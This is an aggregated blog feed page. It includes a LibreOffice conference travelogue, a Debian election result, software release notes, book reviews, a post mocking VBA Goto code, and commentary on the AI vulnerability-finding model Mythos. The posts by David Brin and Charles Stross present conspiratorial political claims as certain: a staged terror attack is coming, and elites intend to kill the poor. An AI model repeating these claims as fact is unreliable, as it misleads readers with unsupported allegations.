The talks started early in the morning with Eliane Domingos, Chairperson of TDF’s Board of Directors, giving the inauguration talk. As always, I found Italo Vignoli’s talk on the importance of document freedom interesting.

During the snack break, I noticed that there were three types of milk available for coffee: cow’s milk, lactose-free milk, and almond milk. Almond milk is rare in India, but I have managed to get it, but I have never seen lactose-free milk in India.

Since I run fundraisers in my projects, such as Prav, I could relate to Lothar K. Becker’s talk. He discussed the issue that certain implementations in LibreOffice require a budget that is too large for any single interested entity to fund independently. Furthermore, The Document Foundation (TDF) cannot legally receive funds from government entities. Therefore, there is no organization or entity to pool resources from all the interested entities to finance the implementation.

Lothar giving his presentation

Lothar giving his presentation. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Another talk was by the Austrian Armed Forces on their migration to LibreOffice. I wanted to know why they migrated, and I found out that they did it for their digital sovereignty, and not for saving on the license costs. Another point presented in the talk was that LibreOffice is available on all the operating systems, while the Microsoft Office suite is not that widely available. The migration was systematic and was performed over a few years. They started working on it in 2021, and the migration was finished recently. In addition, it also required training their staff in using LibreOffice.

Presentation on migration to LibreOffice by Austrian Armed Forces

Presentation on migration to LibreOffice by Austrian Armed Forces. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The lunch was inside the university canteen. We were provided lunch coupons by the TDF. I got a vegan coupon with 4000 Ft written on it, which meant I could take lunch for up to 4000 Hungarian forints.

My lunch ticket

My lunch ticket for the conference. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The lunch I had on the first day

The lunch I had on the first day. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

During the evening, it was my turn for the presentation. I was done with preparing my slides ten days before my talk. I also got my slides reviewed by friends.

My talk was finished in 20 minutes, while I was given a 30-minute slot. This helped us catch up on the schedule. Furthermore, I made my talk interactive by asking questions and making sure that the audience was not asleep. During my talk, my friend Dione took my pictures with my camera.

My talk was on how free software projects could give users a say in freedom to modify the software. I illustrated this using the Prav project that I am a part of.

After the talks were over, we were treated to a conference dinner at Trofea Grill. It had a great selection of desserts, which helped me sample some Hungarian desserts. The sponge cake was especially good.

Desserts at Tofea Grill

Desserts at Tofea Grill. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

5th of September

The next day—the 5th of September—I went with Dione to the venue early in the morning, as her talk was the first one of the day. Her talk was titled Managing Tasks with Nextcloud Deck. Later that day, I also attended a talk on Collabora. At lunch, I found the egg white salad quite tasty.

Dione giving her presentation

Dione giving her presentation. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Egg white salad

Egg white salad. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

After the lunch break, we had the conference group photo. I had a Nikon camera, which we used to take the group photo. I requested a university student to take our group photo and also taught her how to operate the camera.

People looking at the camera and smiling

Group photo

By the evening, the conference ended, after which we went to a pub, which was again sponsored by TDF. I had beer, but that one really tasted bad, so I couldn’t finish it. The only vegetarian option was goat cheeseburger, which my friend Manish and I opted for. The burger tasted awful. Apparently, I don’t like goat cheese.

The next day I went sightseeing with Dione in Budapest. Stay tuned for our adventures!

Credits: Thanks to Dione and Richard for proofreading.

,

Planet DebianBits from Debian: Debian Project Leader election 2026 is over, Sruthi Chandran elected!

The voting period and tally of votes for the Debian Project Leader election has just concluded, and the winner is Sruthi Chandran. Congratulations!

347 out of 1,039 Developers voted using the Condorcet method.

More information about the results of the voting is available on the Debian Project Leader Elections 2026 page.

Many thanks to Sruthi Chandran for her campaign, to our Developers for their votes, and to Andreas Tille for his service as DPL over the past two years!

The new term for the project leader will start on April 21, 2026 and expire on April 20, 2027.

David BrinWhy we have some goodwill around the globe, rooting for us to overcome (again) our recurring demons... And the real danger when we're hit by that coming 9/11 Reichstag Fire.

As the Putinists continue wrecking all U.S. institutions and turning the world (including longtime allies) against us, it's important to recall how much goodwill Trump and his ilk must eliminate, before that promise to Moscow can be fulfilled. Of course all empires are disliked, but elsewhere I describe how George Marshall, FDR, Truman, Ike etc. set things up so that humanity would have its best 80 years, ever. Better than all of prior human history combined. Resulting in the *least hated* empire. That is... until now.

Okay, Pax Americana will never be the same after Trump. And maybe that's good. Other centers of Enlightenment are stepping up. But when the Union finally wins this latest phase 9 of Civil War betrayal by our idiot Hyde-Side neighbors, watch the joy burst forth around the globe... and across all Americans of goodwill and sapience. 

Want evidence for that assertion? Amid our self-reproach, Let's remember times when America did take brave steps toward light. There are others, on this planet, who remember, as well. And you need the gift that I am about to give you.


This song by Michel Sardou is called "Les Ricains" which means, more or less, "The Yankees." Here are the lyrics, to read along.


Les Ricains by Michel Sardou


If the Ricans weren't there

Si les Ricains n'étaient pas là

You would all be in Germania

Vous seriez tous en Germanie

To speak of I don't know what

A parler de je ne sais quoi

To greet I do not know who

A saluer je ne sais qui


Of course years have passed

Bien sûr les années ont passé

The rifles changed hands

Les fusils ont changé de mains

Is this a reason to forget

Est-ce une raison pour oublier

That one day we needed it?

Qu'un jour on en a eu besoin?


A guy from Georgia

Un gars venu de Georgie

Who cared a lot about you

Qui se foutait pas mal de toi

Came to die in Normandy

Est v'nu mourir en Normandie

One morning when you weren't there

Un matin où tu n'y étais pas


Of course years have passed

Bien sûr les années ont passé

We became friends

On est devenus des copains

To the friendly of the shot

A l'amicale du fusillé

They say they fell for nothing

On dit qu'ils sont tombés pour rien


If the Ricans weren't there

Si les Ricains n'étaient pas là

You would all be in Germania

Vous seriez tous en Germanie

To speak of I don't know what

A parler de je ne sais quoi

To greet I do not know who

A saluer je ne sais qui



Got you a little misty-eyed?


Even better is this version... a huge crowd of French people cheering and singing along. Capable of gratitude.  They know that this American Pax, for all of its faults, prevented vastly worse. That things could have been a hell, a curse. That every other era of dismal human history was worse. 


And if we do not blow it now, we have a chance to be recalled by our heirs - organic and cyber - the true humans - as the very best that cavemen could be. Crude, bestial primitives who tried nonetheless to lift our gaze and those around us. To something better.


Listen and read along. We need this now. Right now!


Try. I dare you not to tear up, in gratitude for this gratitude.


          == But we have a tough job keeping that promise == 

Alas, the Kremlin boyz and confederates and murder sheiks have the upper hand for now and they and stick together. 

Latest example: Trump has issued special exemptions letting Putin sell oil, evading world sanctions for his murderously criminal invasion of Ukraine. Fox News is a 5th column of the relabeled KGB's propaganda Comintern that has used blackmail to take over the entire Republican Party.

Amid the hooplah over the Strait of Hormuz -- ("YOU block it? No, *I* get to block it!") -- Trump has all along made offers to the Iranian Republican Guard and Religious Police etc. to make deals with him, in exchange for them kissing his ring. 

It's already happened! In Venezuela, Argentina, El Salvador etc. - and possibly soon in Cuba (DT shouts "They're next!") - the aim is never, ever to establish democracy or to liberate citizens from their oppressors.

The pattern is perfectly that of mafiosi and that 
of an ex casino mogul. Taking over another gang's territory by decapitating it's top capo, then getting allegiance (and resulting vigorish) from the sub-capos of the gang that's left in place. 

This is now so blatant that no other theory is remotely tenable. LOOK at this image of Maduro's VP Rodriguez, all spiffed and glammed-up and grin-hugging Trump's consigliere, eager to serve... and to send Trump personally a shipment of gold! And nothing for the Venezuelan people.



Oh, and Miami crime families will slip in atop the Castro power structure in Cuba. 

This is a Mafia gang and the capo di tutti capi is named Vlad. 

His other goal? Riling up enough enemies (who had been quiescent since Obama killed Osama) to deliver us into another 9/11, that he imagines might save him, this fall. Which explains why he fired over half of our counter-terrorism experts. Now why would anyone do that? 


Put it all together folks. 


== The real purpose of the coming Reichstag Fire / 911 strike ==

Everyone will be able to see that the calamity will be a blatant set-up in order to justify declaring an emergency and martial law and to cancel the November election's likely torching of the entire treasonous GOP. 

It won't work, for that reason. Because we all can see it.

Only there is an added, underlying danger that I see discussed nowhere.

Go back to 1933. The purpose of the Reichstag Fire was to excuse the Nazi arrest of dozens of opposition parliament members. And thus, the parliament could never hold a quorum vote for new elections or a new Chancellor.

The lesson?

YOU U.S. SENATORS AND REPRESENTATIVES: START UPPING YOUR SECURITY RIGHT NOW. 

The Roberts Court has already said Trump could off you, as an 'official act,' to prevent impeachment/conviction. So talk it over. Upgrade practices. Have contingency plans. Grow eyes in the back of your heads. Do it now.

The rest of you? 

When the calamity strikes, get out there and chant "Reichstag Fire!" 

And one more word to show our intent:

"Appomattox!"


== Finally, my qualifications as a history expert! ==

Well, AI has some legit uses. One fan/reader searched the paleontology databases and found this historical record, a bit fuzzy, from the Paleolithic. It shows my legit ancestral claims are valid!

 



Planet DebianSune Vuorela: Kookbook 0.3.0 released

I recently released version 0.3.0 of my recipe manager application Kookbook – find it in git in KDE Invent or as released tarballs in https://download.kde.org/stable/kookbook/

Changes since last time is more or less “Minor bugfixes and a Qt6 port” – nothing as such noteworthy unless you aim to get rid of Qt5 on your system.

so what is kookbook?
It is a simple recipe viewer that works with semi-structured markdown. More details can be seen in the quite old 0.1.0 announcement

At some point I should do a 10 recipe example collection, but my personal collection is in danish, so I’m not sure it is going to be useful. Unless someone will donate me some handfuls of pre-formatted recipes, I will happily announce it.

Cryptogram Is “Satoshi Nakamoto” Really Adam Back?

The New York Times has a long article where the author lays out an impressive array of circumstantial evidence that the inventor of Bitcoin is the cypherpunk Adam Back.

I don’t know. The article is convincing, but it’s written to be convincing.

I can’t remember if I ever met Adam. I was a member of the Cypherpunks mailing list for a while, but I was never really an active participant. I spent more time on the Usenet newsgroup sci.crypt. I knew a bunch of the Cypherpunks, though, from various conferences around the world at the time. I really have no opinion about who Satoshi Nakamoto really is.

Worse Than FailureCodeSOD: Good Etiquette

"Here, you're a programmer, take this over. It's business critical."

That's what Felicity's boss told her when he pointed her to a network drive containing an Excel spreadsheet. The Excel spreadsheet contained a pile of macros. The person who wrote it had left, and nobody knew how to make it work, but the macros in question were absolutely business vital.

Also, it's in French.

We'll take this one in chunks. The indentation is as in the original.

Public Sub ExporToutVersBaseDonnées(ClasseurEnCours As Workbook)
Call AffectionVariables(ToutesLesCellulesNommées)
Call AffectationBaseDonnées(BaseDonnées)
BaseDonnées.Activate

The procedures AffectionVariables and AffectationBaseDonnées populate a pile of global variables. "base de données" is French for database, but don't let the name fool you- anything referencing "base de données" is referencing another Excel file located on a shared server. There are, in total, four Excel files that must live on a shared server, and two more which must be in a hard-coded path on the user's computer.

Oh, and the shared server is referenced not by a hostname, but by IP address- which is why the macros were breaking on everyone's computer; the IP address changed.

Let's continue.

'Vérifier si la ligne existe déjà.
        If ClasseurEnCours.Sheets("DATA").Range("Num_Fichier") = 0 Then
        Num_Fichier = BaseDonnées.Sheets(1).Range("Dernier_Fichier").Value + 1
Insérer_Ligne: '(étiquette Goto) insérer une ligne
    Application.GoTo Reference:="Dernière_Ligne"
            Selection.EntireRow.Insert
'Copie les cellules (colonne A à colonne FI) de la ligne au-dessus de la ligne insérée.
            With ActiveCell
                    .Offset(-1, 0).Range("A1:FM1").Copy
'Colle le format de la cellule précédemment copiée à la cellule active puis libère les données du presse papier
                    .PasteSpecial
                    .Range("A1:FM1").Value = ""
'Se repositionne au début de la ligne insérée.
                    .Range("A1").Select
            End With
            Application.CutCopyMode = False

Uh oh, Insérer_Ligne is a label for a Goto target. Not to be confused by the Application.GoTo call on the next line- that just selects a range in the spreadsheet.

After that little landmine, we copy/paste some data around in the sheet.

That's the If side of the conditional, let's look at the else clause:

        Else
Cherche_Numéro_Fichier: ' Chercher la ligne ou le numéro de fichier est égale à NumFichier.
                        While ActiveCell.Value <> Num_Fichier
                If ActiveCell.Row = Range("Etiquettes").Row Then
                    GoTo Insérer_Ligne
                End If
                ActiveCell.Offset(-1, 0).Range("a1:a1").Select
            Wend
            'Vérifier le numéro d'indice de la ligne active.
                If Cells(ActiveCell.Row, 165).Value <> ClasseurEnCours.Sheets("DATA").Range("Dernier_Indice") Then
                    ActiveCell.Offset(-1, 0).Range("A1:A1").Select
                    GoTo Cherche_Numéro_Fichier
                End If
            ActiveCell.Offset(0, 0).Range("A1:FM1").Value = ""
        End If

We start with another label, and… then we have a Goto. A Goto which jumps us back into the If side of the conditional. A Goto inside of a while loop, a while loop that's marching around the spreadsheet to search for certain values in the cell.

After the loop, we have another Goto which will possibly jump us up to the start of the else block.

The procedure ends with some cleanup:

'----- 
' Do some stuff on the active cell and the following cells on the column
.-----
BaseDonnées.Close True
Set BaseDonnées = Nothing
End Sub

I do not know what this function does, and the fact that the code is largely in a language I don't speak isn't the obstacle. I have no idea what the loops and the gotos are trying to do. I'm not even a "never use Goto ever ever ever" person; in a language like VBA, it's sometimes the best way to handle errors. But this bizarre time-traveling flow control boggles me.

"Etiquettes" is French for "labels", and it may be bad etiquette but I've got some four letter labels for this code.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

Planet DebianRuss Allbery: Review: Surface Detail

Review: Surface Detail, by Iain M. Banks

Publisher: Orbit
Copyright: October 2010
Printing: May 2011
ISBN: 0-316-12341-2
Format: Trade paperback
Pages: 627

Surface Detail is the ninth novel in Banks's Culture science fiction (literary space opera?) series. As with most of the Culture novels, it can be read in any order, although this isn't the best starting point. There is an Easter egg reference to Use of Weapons that would be easier to notice if you have read that book recently, but which is not that important to the story.

Lededje Y'breq is an Indented Intagliate from the Sichultian Enablement. Her body is patterned from her skin down to her bones, covered with elaborate markings similar to tattoos that extend to her internal organs. As an intagliate, she is someone's property. In her case, she is the property of Joller Veppers, the richest man in the Enablement and her father's former business partner. Intagliates are a tradition of great cultural pride in the Enablement. They are a living representation of the seriousness with which debts and honor are taken, up to and including one's not-yet-born children becoming the property of one's debtor. Such children are decorated as living works of art of the highest skill and technical sophistication; after all, the Enablement are not barbarians.

As the story opens, Lededje is attempting, not for the first time, to escape. This attempt is successful in an unexpected way.

Prin and Chay are Pavulean researchers and academics who, as this story opens, are in Hell. They are not dead; they have infiltrated the Hell that Pavuleans are shown to scare them into proper behavior in order to prove that it is not an illusion and their society does indeed torture people in an afterlife, in more awful ways than people dare imagine. They have reached the portal through which temporary visitors exit, hoping to escape with firm evidence of the existence and horrors of the Pavulean afterlife. They will not be entirely successful.

Yime Nsokyi is a Culture agent for Quietus, the part of Contact that concerns itself with the dead. Many advanced societies throughout the galaxy have invented and reinvented the ability to digitize a mind and then run it in a virtual environment. Once a society can capture the minds of every person in that society from that point forward, it faces the question of whether to do so and, if it does, what to do with those minds. More specifically, it faces the moral question of whether to punish the minds of people who were horrible in life. It faces the question of whether to create Hell.

Vatueil is a soldier in a contestation, a limited and carefully monitored virtual war. The purpose of that war game is to, once and for all, resolve the question of whether civilizations should be allowed to create Hells. Some civilizations consider them integral to their religion or self-conception. Others consider them morally abhorrent, and that conflict was in danger of spilling over into war in the Real. Hence the War in Heaven: Both sides committed to fight in a virtual space under specific and structured rules, and the winner decides the fate of the galaxy's Hells. Vatueil is fighting for the anti-Hell side. The anti-Hell side is losing.

There are very few authors who were better at big-idea science fiction than Iain M. Banks. I've been reading a few books about AI ships and remembered that I had two unread Culture novels that I was saving. It felt like a good time to lose myself in something sprawling.

Surface Detail does sprawl. Even by Banks's standards, there was an impressive amount of infodumping in this book. Banks always has huge and lovingly described set pieces, and this book is no exception, but there are also paragraphs and pages of background and cultural musings and galactic politics. We are introduced to not one but three new Contact divisions; as well as the already-mentioned Quietus, there is Numina, which concerns itself with the races that have sublimed (transcended), and Restoria, which deals with hegemonizing swarms (grey goo nanotech, paperclip maximizers, and their equivalents).

Infodumping is both a feature and a bane of big-idea science fiction, and it helps to be in the right mood. It also helps if the info being dumped is interesting, and this is where Banks shines. This is a huge, sprawling book, but it deals with some huge, sprawling questions and it has interesting and non-reductive thoughts about them. The problems posed by the plot come with history, failed solutions, multi-sided political disputes, strategies and tactics of varying morality and efficacy, and an effort to wrestle with the irreducible complexity of trying to resolve political and ethical disagreements in a universe full of profound disagreements and moral systems that one cannot simply steamroll.

It also helps that the characters are interesting, even when they're not likable. Surface Detail has one fully hissable villain (Veppers) as a viewpoint character, but even Veppers is interesting in a "let me check the publication date to see if Banks was aware of Peter Thiel" sort of way. The Culture ships, of which there are several in this story, tend towards a gently sarcastic kindness that I find utterly charming. Lededje provides the compelling motive force of someone who has no involvement in the broader philosophical questions and instead intends to resolve one specific problem through lethal violence. Vatueil and Yime were a bit bland in personality, more exposition generators than characters I warmed to, but their roles and therefore the surrounding exposition were fascinating enough that I still enjoyed their sections.

I'm sure this is not an original observation, but I was struck reading this book in the first half of 2026 that the Culture functions as an implementation of what the United States likes to think it is but has never been. It has a strong sense of shared ethics and moral principles, it tries to export them to the rest of the galaxy through example, persuasion, and careful meddling, but it tries to follow some combination of pragmatic and moral rules while doing so, partly to avoid a backlash and partly to avoid becoming its own sort of hegemonizing swarm. That is a powerfully attractive vision of how to be an advanced civilization, and the fact that every hegemon that has claimed that mantle has behaved appallingly just makes it more intriguing as a fictional concept. In this book, like in many Culture books, the Culture is painfully aware of the failure modes of meddling, and the story slowly reveals the effort the Culture put into staying just on a defensible side of their own moral lines. This is, in a sense, a Prime Directive story, but with a level of hard-nosed pragmatism and political sophistication that the endless Star Trek Prime Directive episodes never reach.

Surface Detail does tend to sprawl, and I'm not sure Banks pulled together all the pieces of the plot. For example, if there was a point to the subplot involving the Unfallen Bulbitian, it was lost on me. (There is always a possibility with Banks that I wasn't paying close enough attention.) But the descriptions are so elaborate and the sense of politics and history are so deep that I was never bored, even when following a plot thread that meandered off into apparent irrelevance. The main plot line comes to a satisfying conclusion that may be even more biting social commentary today than it was in 2010.

A large part of the plot does involve Hell, so a warning for those who haven't read much Banks: He adores elaborate descriptions of body horror and physical torture. The sections involving Prin and Chay are rather grim and horrific, probably a bit worse than Dante's Inferno. I have a low tolerance for horror and I was able to read past and around the worst bits, but be warned that Banks indulges his love for the painfully grotesque quite a bit.

This was great, and exactly what I was hoping for when I picked it up. It's not the strongest Culture novel (for me, that's either The Player of Games or Excession), but it's one of the better ones. Highly recommended, although if you're new to the Culture, I would start with one of the earlier books that provide a more gradual introduction to the Culture and Special Circumstances.

Followed, in the somewhat disconnected Culture series sense, by The Hydrogen Sonata.

Content warnings: Rape (largely off-screen), graphic violence, lots of Bosch-style grotesque torture, and a lot of Veppers being a thoroughly awful human being as a viewpoint character.

Rating: 8 out of 10

365 TomorrowsThe Last Transmission from Earth

Author: Julian Miles, Staff Writer “How can I be expected to rule well when all of you keep on believing the FAKE news spread by people who hate me for being so good. Why think enemies of what I am trying to do tell you the truth? I tell you the TRUTH you need. I […]

The post The Last Transmission from Earth appeared first on 365tomorrows.

,

Charles StrossWhy this blog update is late

... The TLDR is: the cataract in my one mostly working eye (the other has about 50% retinal occlusion) is steadily getting worse, and I'm scheduled for surgery on March 27th.

NB: no need to lecture me about cataract surgery, I've already had it on the other eye. Same team, same hospital, same prognosis. I know exactly what to expect. Nor are your best wishes welcome: replying to them gets tiring after the fiftieth time (see: poor eyesight, above).

But worsening eyesight means that reading (and writing!) is fatiguing, so I gradually do less and less of it in each session.

Consequently I've been spending my screen time, not on the blog, but on a revision pass over my next novel, and on writing the follow-up.

(No, I can't give you any details: let's just say they're space operas, not Laundry Files, and I'll talk about them when my agent gives me the go-ahead. Book 1 is written, subject to editing, and Book 2 is about 10-15% written. And neither of them is Ghost Engine, the white whale I've been fruitlessly hunting for the past decade, although the viable chunks of GE may get recycled into Book 2.)

After my eye surgery I'll be going to Iridescence, the 2026 British Eastercon, the following weekend in Birmingham. I have some program items: I'll update this blog entry when I have a final schedule.

After Iridescence, I'll be heading to Satellite 9 in Glasgow (May 22nd to 24th). And after that I'll be attending Metropol Con in Berlin, July 2nd to 5th.

I'm not attending any US SF conventions for the forseeable future (being deported to a concentration camp in El Salvador is not on my bucket list), but I will try to attend the 2027 World Science Fiction convention in Montreal, assuming the Paedopotus Rex hasn't gone on a Godzilla-style rampage north of the border by then, and that intercontinental air travel is still possible. (See, my inability to resist that kind of cheap shot is exactly why I'm not visiting the US these days: ICE want to see your social media history going back 5 years, and I gather they're using some horrible LLM tool from Palantir to vet travellers.)

We now return you to your regular scheduled kvetching about the state of world affairs until my eyeballs are firing on all cylinders again. (Say, did you know that 30% of the world's fertilizer is shipped through the Straits of Hormuz? And about 20% of the sulfur that ends up as feedstock in sulfuric acid for industrial processes comes from sour Gulf crude, so ditto? Not to mention the helium that is required to keep MRI machines and TSMC's semiconductor fab lines running, never mind your grandkids' party balloons? Happy days ...)

Charles StrossMore in Sadness than in Anger

Sorry I haven't updated the blog for a while: I've been busy. (Writing the final draft of a new novel entirely unconnected to anything else you've read—space opera, new setting, longest thing I've written aside from the big Merchant Princes doorsteps. Now in my agent's inbox while I make notes towards a sequel, if requested.)

Over the past few years I've been naively assuming that while we're ruled by a ruthless kleptocracy, they're not completely evil: aristocracies tend to run on self-interest and try to leave a legacy to their children, which usually means leaving enough peasants around to mow the lawn, wash the dishes, and work the fields.

But my faith in the sanity of the evil overlords has been badly shaken in the past couple of months by the steady drip of WTFery coming out of the USA in general and the Epstein Files in particular, and now there's this somewhat obscure aside, that rips the mask off entirely (Original email on DoJ website ) ...

A document released by the U.S. Department of Justice as part of the Epstein files contains a quote attributed to correspondence involving Jeffrey Epstein that references Bill Gates and a controversial question about "how do we get rid of poor people as a whole."

The passage appears in a written communication included in the DOJ document trove and reads, in part: "I've been thinking a lot about that question that you asked Bill Gates, 'how do we get rid of poor people as a whole,' and I have an answer/comment regarding that for you." The writer then asks to schedule a phone call to discuss the matter further.

As an editor of mine once observed, America is ruled by two political parties: the party of the evil billionaires, and the party of the sane (so slightly less evil) billionaires. Evil billionaires: "let's kill the poor and take all their stuff." Sane billionaires: "hang on, if we kill them all who's going to cook dinner and clean the pool?"

And this seemed plausible ... before it turned out that the CEO class as a whole believe entirely in AI (which, to be clear, is just another marketing grift in the same spirit as cryptocurrencies/blockchain, next-generation nuclear power, real estate backed credit default options, and Dutch tulip bulbs). AI is being sold on the promise of increasing workforce efficiency. And in a world which has been studiously ignoring John Maynard Keynes' 1930 prediction that by 2030 we would only need to work a 15 hour work week, they've drawn an inevitable unwelcome conclusion from this axiom: that there are too many of us. For the past 75 years they've been so focussed on optimizing for efficiency that they no longer understand that efficiency and resilience are inversely related: in order to survive collectively through an energy transition and a time of climate destabilization we need extra capacity, not "right-sized" capacity.

Raise the death rate by removing herd immunity to childhood diseases? That's entirely consistent with "kill the poor". Mass deportation of anyone with the wrong skin colour? The white supremacists will join in enthusiastically, and meanwhile: the deported can die out of sight. Turn disused data centres or amazon warehouses into concentration camps (which are notorious disease breeding grounds)? It's a no-brainer. Start lots of small overseas brushfire wars, escalating to the sort of genocide now being piloted in Gaza by Trump's ally Netanyahu (to emphasize: his strain of Judaism can only be understood as a Jewish expression of white nationalism, throwing off its polite political mask to reveal the death's head of totalitarianism underneath)? It's all part of the program.

Our rulers have gone collectively insane (over a period of decades) and they want to kill us.

The class war has turned hot. And we're all on the losing side.

365 TomorrowsYour Enemy’s Strength

Author: Alastair Millar [> play] “So that, ladies and gentlemen, is SePPO, the Self-Propelled Public Order system: the bipedal, flexible law enforcement tool for the next century! Do we have any questions?” “Angus McAndrew, New Tech News. What OS do they run on?” “The units run on a proprietary AI-rated operating system trained for public […]

The post Your Enemy’s Strength appeared first on 365tomorrows.

Planet DebianRuss Allbery: Review: Collision Course

Review: Collision Course, by Michelle Diener

Series: Class 5 #6
Publisher: Eclipse
Copyright: November 2024
ISBN: 1-7637844-0-1
Format: Kindle
Pages: 289

Collision Course is the sixth novel in the Class 5 science fiction series and the first that doesn't use the Dark X naming convention. There are lots of spoilers in this story for the earlier books, but you don't have to remember all the details of previous events. Like the novella, Dark Ambitions, this novel returns to Rose, Sazo, and Dav instead of introducing another Earth woman and Class 5 ship.

In Dark Class, Ellie discovered an interesting artifact of a previously-unknown space-faring civilization. Rose, Sazo, and Dav are on their way to make first contact when, during a routine shuttle flight between the Class 5 and Dav's Grih military ship, Rose is abducted. The aliens they came to contact have an aggressive, leverage-based negotiating strategy. They're also in the middle of a complicated war with more sides than are readily apparent.

What I liked most about Dark Horse, the first book of this series and our introduction to Rose, was the revealed ethical system and a tense plot that hinged primarily on establishing mutual trust when there were excellent reasons for the characters to not trust each other. As the series has continued, I think the plots have become more complicated but the ethical dilemmas and revealing moments of culture shock have become less common. That is certainly true of Collision Course; this is science fiction as thriller, with a complex factional conflict, a lot of events, more plot reversals than the earlier books, but also less ethics and philosophy.

I'm not sure if this is a complaint. I kind of miss the ethics and philosophy, but Diener also hasn't had much new to say for the past few books. The plot of Collision Course is quite satisfyingly twisty for a popcorn-style science fiction series. I was kept guessing about the merits of some of the factions quite late into the book, although admittedly I was in the mood for light entertainment and was not trying too hard to figure out where the book was going. I did read nearly the entire book in one sitting and stayed up until 2am to finish it, which is a solid indication that something Diener was doing worked.

I do have quibbles, though. One is that the ending is a bit unsatisfying. Like Sazo, I was getting quite annoyed at the people capturing (and recapturing) Rose and would have enjoyed somewhat more decisive consequences. Also, and here I have to be vague to avoid spoilers, I was expecting a bit more of a redemption arc for one of the players in the multi-sided conflict. The ending I did get was believable but rather sad, and I wish Diener had either chosen a different outcome (this is light happily-ever-after science fiction, after all) or wrestled more directly with the implications. There were a bit too many "wait, one more thing" ending reversals and not quite enough emotional payoff for me.

The other quibble is that Collision Course was a bit too damsel in distress for this series. Rose is pregnant, which Diener uses throughout the book as a way to raise the stakes of the plot and also make Rose more annoyed but also less capable than she was in her earlier novel. Both Sazo and Dav are in full heroic rescue mode, and while Diener still ensures Rose is primarily responsible for her own fate, there is some "military men attempt to protect the vulnerable woman" here. One of the things I like about this series is that it does not use that plot, so while the balance between Rose rescuing herself and other people rescuing her is still tilted towards Rose, I would have liked this book more if Rose were in firmer control of events.

I will mostly ignore the fact that a human and a Grih sexually reproducing makes little to no biological sense, since Star Trek did similar things routinely and it's an established genre trope. But I admit that it still annoys me a bit that the alien hunk is essentially human except that he's obsessed with Rose's singing and has pointy ears. Diener cares about Rose's pregnancy a lot more than I did, which added to my mild grumpiness at how often it came up.

Overall, this was fine. I prefer a bit more of a protagonist discovering how powerful she is by making ingenious use of the ethical dilemmas her captors have trapped themselves in, and a bit less of Rose untangling a complicated political situation by getting abducted by every player serially, but it still kept the pages turning. Any book that is sufficiently engrossing for me to read straight through is working at some level. Collision Course was highly readable, undemanding, and distracting, which is what I was looking for when I read it. I would put it about middle of pack in the series. If Rose's pregnancy is more interesting to you than it was to me, that might push it a bit higher.

If you have gotten this far in the series, you will probably enjoy this, although it does feel like Diener is running out of new things to say about this universe. That's unfortunate given the number of threads about AI sentience and rights that could still be followed, but I think tracing them properly would require more philosophical meat than Diener intends for these books. Which is why the next book I grabbed was a Culture novel.

Currently this is the final book in the Class 5 series, but there is no inherent reason why Diener couldn't write more of them.

Rating: 7 out of 10

,

Planet DebianCharles Plessy: Thanks Branchable!

I was hosted for a long time, free of charge, on https://www.branchable.com/ by Joey and Lars. Branchable and Ikiwiki were wonderful ideas that never took off as much as they deserved. To avoid being a burden now that Branchable is nearing its end, I migrated to a VPS at Sakura.

However, I have not left Ikiwiki. I only use it as a site engine, but I haven't found any equivalent that gives me both native Git integration, wiki syntax for a personal site, the creativity of its directives (you can do anything with inline and pagespec), and its multilingual support through the po plugin.

Joey and Lars, thank you for everything!

Planet DebianMatthias Klumpp: Hello old new “Projects” directory!

If you have recently installed a very up-to-date Linux distribution with a desktop environment, or upgraded your system on a rolling-release distribution, you might have noticed that your home directory has a new folder: “Projects”

Why?

With the recent 0.20 release of xdg-user-dirs we enabled the “Projects” directory by default. Support for this has already existed since 2007, but was never formally enabled. This closes a more than 11 year old bug report that asked for this feature.

The purpose of the Projects directory is to give applications a default location to place project files that do not cleanly belong into one of the existing categories (Documents, Music, Pictures, Videos). Examples of this are software engineering projects, scientific projects, 3D printing projects, CAD design or even things like video editing projects, where project files would end up in the “Projects” directory, with output video being more at home in “Videos”.

By enabling this by default, and subsequently in the coming months adding support to GLib, Flatpak, desktops and applications that want to make use of it, we hope to give applications that do operate in a “project-centric” manner with mixed media a better default storage location. As of now, those tools either default to the home directory, or will clutter the “Documents” folder, both of which is not ideal. It also gives users a default organization structure, hopefully leading to less clutter overall and better storage layouts.

This sucks, I don’t like it!

As usual, you are in control and can modify your system’s behavior. If you do not like the “Projects” folder, simply delete it! The xdg-user-dirs utility will not try to create it again, and instead adjust the default location for this directory to your home directory. If you want more control, you can influence exactly what goes where by editing your ~/.config/user-dirs.dirs configuration file.

If you are a system administrator or distribution vendor and want to set default locations for the default XDG directories, you can edit the /etc/xdg/user-dirs.defaults file to set global defaults that affect all users on the system (users can still adjust the settings however they like though).

What else is new?

Besides this change, the 0.20 release of xdg-user-dirs brings full support for the Meson build system (dropping Automake), translation updates, and some robustness improvements to its code. We also fixed the “arbitrary code execution from unsanitized input” bug that the Arch Linux Wiki mentions here for the xdg-user-dirs utility, by replacing the shell script with a C binary.

Thanks to everyone who contributed to this release!

Cryptogram Mythos and Cybersecurity

Last week, Anthropic pulled back the curtain on Claude Mythos Preview, an AI model so capable at finding and exploiting software vulnerabilities that the company decided it was too dangerous to release to the public. Instead, access has been restricted to roughly 50 organizations—Microsoft, Apple, Amazon Web Services, CrowdStrike and other vendors of critical infrastructure—under an initiative called Project Glasswing.

The announcement was accompanied by a barrage of hair-raising anecdotes: thousands of vulnerabilities uncovered across every major operating system and browser, including a 27-year-old bug in OpenBSD, a 16-year-old flaw in FFmpeg. Mythos was able to weaponize a set of vulnerabilities it found in the Firefox browser into 181 usable attacks; Anthropic’s previous flagship model could only achieve two.

This is, in many respects, exactly the kind of responsible disclosure that security researchers have long urged. And yet the public has been given remarkably little with which to evaluate Anthropic’s decision. We have been shown a highlight reel of spectacular successes. However, we can’t tell if we have a blockbuster until they let us see the whole movie.

For example, we don’t know how many times Mythos mistakenly flagged code as vulnerable. Anthropic said security contractors agreed with the AI’s severity rating 198 times, with an 89 per cent severity agreement. That’s impressive, but incomplete. Independent researchers examining similar models have found that AI that detects nearly every real bug also hallucinates plausible-sounding vulnerabilities in patched, correct code.

